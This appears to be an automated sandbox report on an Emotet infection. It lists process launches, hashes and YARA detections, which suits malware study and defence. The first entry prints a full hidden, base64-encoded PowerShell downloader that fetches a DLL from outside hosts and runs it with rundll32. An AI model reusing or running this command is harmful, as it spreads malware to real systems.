                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:20:10:42
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAnACsAJwBlAG4AJwApACsAJwBtACcAKwAoACcAYQAnACsAJwB5AHQAaQAnACsAJwBuAGgALgB0ACcAKQArACcAYwAnACsAJwB0AGUAJwArACgAJwBkAHUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtACcAKwAnAHMAbgAnACkAKwAnAGEAJwArACgAJwBwAHMAJwArACcAaABvACcAKwAnAHQAcwAvAFYAJwApACsAJwB6ACcAKwAnAEoATQAnACsAJwAvACcAKQAuACIAcgBlAFAAYABMAEEAYwBlACIAKAAoACgAJwBuAHMAJwArACcAIAB3ACcAKQArACcAdQAnACsAKAAnACAAZABiACAAbgAnACsAJwBkACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABKAGcANAAxAHMAYwB3ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AMwAyAE8AIAArACAAJABaAHoAOAAyAF8ANAAyACAAKwAgACQATwA3ADQAWQApADsAJABIADAAOABUAD0AKAAoACcAQgA2ACcAKwAnADgAJwApACsAJwBKACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwByAGEAdgB0AGkAZQAgAGkAbgAgACQATgBpAG8AbwBpADIAcQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAcwBZAHMAVABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAEUATgB0ACkALgAiAEQATwBXAGAATgBsAGAATwBhAGQAZgBgAEkATABlACIAKAAkAFcAcgBhAHYAdABpAGUALAAgACQAVQBrADEAdAB0ADEAXwApADsAJABLAF8ANQBCAD0AKAAnAFQAMgAnACsAJwBfAFYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUAawAxAHQAdAAxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADEAOAAxADQAKQAgAHsAJgAoACcAcgB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAVQBrADEAdAB0ADEAXwAsACgAKAAnAEEAbgAnACsAJwB5AFMAdAAnACkAKwAoACcAcgAnACsAJwBpAG4AJwApACsAJwBnACcAKQAuACIAdABvAFMAVAByAGkAYABOAEcAIgAoACkAOwAkAEcAMAAzAEwAPQAoACcAVQA1ACcAKwAnADYAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFIAMQAzAEoAPQAoACcAUgA4ACcAKwAnAF8ASgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAOAAyAEUAPQAoACcAVwAnACsAKAAnADIAOAAnACsAJwBMACcAKQApAA==
                                                                          Imagebase:0x13ffe0000
                                                                          File size:473600 bytes
                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          General

                                                                          Start time:20:12:32
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                                                                          Imagebase:0xffd90000
                                                                          File size:45568 bytes
                                                                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:20:12:32
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2330883211.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:20:12:33
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2333967935.0000000000280000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2333875086.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:20:12:35
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2335519485.0000000000340000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2335352749.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:20:12:36
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2338149952.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2338123179.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:20:12:37
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2339483010.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2339441337.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:20:12:38
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2342378229.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2342497051.0000000000280000.00000040.00000001.sdmp, Author: Joe Security
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:20:12:39
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2343974004.00000000004A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2343885574.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2343843229.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:20:12:40
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2347071363.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2347031079.0000000000280000.00000040.00000001.sdmp, Author: Joe Security
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:20:12:41
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2348536550.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2348563781.00000000002F0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2348503069.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security

                                                                          General

                                                                          Start time:20:12:42
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2351415450.0000000000750000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2351067576.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2351291099.00000000006B0000.00000040.00020000.sdmp, Author: Joe Security

                                                                          General

                                                                          Start time:20:12:43
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2352976974.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2352906309.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2352930564.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security

                                                                          General

                                                                          Start time:20:12:44
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2355550940.00000000006E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2355569966.0000000000750000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2355670534.0000000000930000.00000040.00000001.sdmp, Author: Joe Security

                                                                          General

                                                                          Start time:20:12:45
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2358322887.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2359551824.0000000000460000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2358696763.0000000000270000.00000040.00000001.sdmp, Author: Joe Security

                                                                          General

                                                                          Start time:20:12:46
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2360129710.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2360111276.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2360228021.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

                                                                          General

                                                                          Start time:20:12:48
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2363852482.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2368454329.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2364687136.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security

                                                                          General

                                                                          Start time:20:12:49
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2368006651.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2368531156.0000000000450000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2367980145.0000000000220000.00000040.00000001.sdmp, Author: Joe Security

                                                                          General

                                                                          Start time:20:12:50
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2369643612.0000000000180000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2370162675.00000000003B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2370274121.0000000000550000.00000040.00000001.sdmp, Author: Joe Security

                                                                          General

                                                                          Start time:20:12:52
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1
                                                                          Imagebase:0x820000
                                                                          File size:44544 bytes
